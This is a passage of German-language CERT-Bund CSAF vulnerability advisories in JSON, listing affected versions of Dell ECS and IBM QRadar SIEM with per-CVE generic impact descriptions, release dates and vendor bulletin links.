"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-29409"
},
{
"cve": "CVE-2023-2976",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-2976"
},
{
"cve": "CVE-2023-30630",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-30630"
},
{
"cve": "CVE-2023-30772",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-30772"
},
{
"cve": "CVE-2023-31084",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-31084"
},
{
"cve": "CVE-2023-3138",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-3138"
},
{
"cve": "CVE-2023-31436",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-31436"
},
{
"cve": "CVE-2023-31484",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-31484"
},
{
"cve": "CVE-2023-32269",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-32269"
},
{
"cve": "CVE-2023-32697",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-32697"
},
{
"cve": "CVE-2023-33264",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-33264"
},
{
"cve": "CVE-2023-34034",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-34034"
},
{
"cve": "CVE-2023-34035",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-34035"
},
{
"cve": "CVE-2023-34453",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-34453"
},
{
"cve": "CVE-2023-34454",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-34454"
},
{
"cve": "CVE-2023-34455",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-34455"
},
{
"cve": "CVE-2023-34462",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-34462"
},
{
"cve": "CVE-2023-35116",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-35116"
},
{
"cve": "CVE-2023-3635",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-3635"
},
{
"cve": "CVE-2023-36479",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-36479"
},
{
"cve": "CVE-2023-39533",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-39533"
},
{
"cve": "CVE-2023-40167",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-40167"
},
{
"cve": "CVE-2023-40217",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-40217"
},
{
"cve": "CVE-2023-41105",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-41105"
},
{
"cve": "CVE-2023-41900",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-41900"
},
{
"cve": "CVE-2023-43642",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-43642"
},
{
"cve": "CVE-2023-43804",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-43804"
},
{
"cve": "CVE-2023-44487",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-44487"
},
{
"cve": "CVE-2023-45803",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2023-45803"
},
{
"cve": "CVE-2024-21626",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2024-21626"
}
]
}
wid-sec-w-2024-1086
Vulnerability from csaf_certbund
Published
2024-05-09 22:00
Modified
2024-10-24 22:00
Summary
IBM QRadar SIEM: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
IBM QRadar Security Information and Event Management (SIEM) bietet Unterstützung bei der Erkennung und Priorisierung von Sicherheitsbedrohungen im Unternehmen.
Angriff
Ein Angreifer kann mehrere Schwachstellen in IBM QRadar SIEM ausnutzen, um beliebigen Code auszuführen, Sicherheitsmaßnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting (XSS)-Angriff durchzuführen oder einen nicht spezifizierten Angriff auszuführen.
Betroffene Betriebssysteme
- Linux
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "IBM QRadar Security Information and Event Management (SIEM) bietet Unterst\u00fctzung bei der Erkennung und Priorisierung von Sicherheitsbedrohungen im Unternehmen.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in IBM QRadar SIEM ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting (XSS)-Angriff durchzuf\u00fchren oder einen nicht spezifizierten Angriff auszuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2024-1086 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-1086.json"
},
{
"category": "self",
"summary": "WID-SEC-2024-1086 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-1086"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7150684 vom 2024-05-09",
"url": "https://www.ibm.com/support/pages/node/7150684"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7174015 vom 2024-10-24",
"url": "https://www.ibm.com/support/pages/node/7174015"
}
],
"source_lang": "en-US",
"title": "IBM QRadar SIEM: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2024-10-24T22:00:00.000+00:00",
"generator": {
"date": "2024-10-25T08:08:54.231+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.8"
}
},
"id": "WID-SEC-W-2024-1086",
"initial_release_date": "2024-05-09T22:00:00.000+00:00",
"revision_history": [
{
"date": "2024-05-09T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2024-10-24T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von IBM aufgenommen"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "7.5.0",
"product": {
"name": "IBM QRadar SIEM 7.5.0",
"product_id": "T023574",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:qradar_siem:7.5.0"
}
}
},
{
"category": "product_version_range",
"name": "\u003c7.5.0 UP8 IF02",
"product": {
"name": "IBM QRadar SIEM \u003c7.5.0 UP8 IF02",
"product_id": "T034673"
}
},
{
"category": "product_version",
"name": "7.5.0 UP8 IF02",
"product": {
"name": "IBM QRadar SIEM 7.5.0 UP8 IF02",
"product_id": "T034673-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:qradar_siem:7.5.0_up8_if02"
}
}
}
],
"category": "product_name",
"name": "QRadar SIEM"
}
],
"category": "vendor",
"name": "IBM"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2007-4559",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2007-4559"
},
{
"cve": "CVE-2014-3146",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2014-3146"
},
{
"cve": "CVE-2018-19787",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2018-19787"
},
{
"cve": "CVE-2019-13224",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2019-13224"
},
{
"cve": "CVE-2019-16163",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
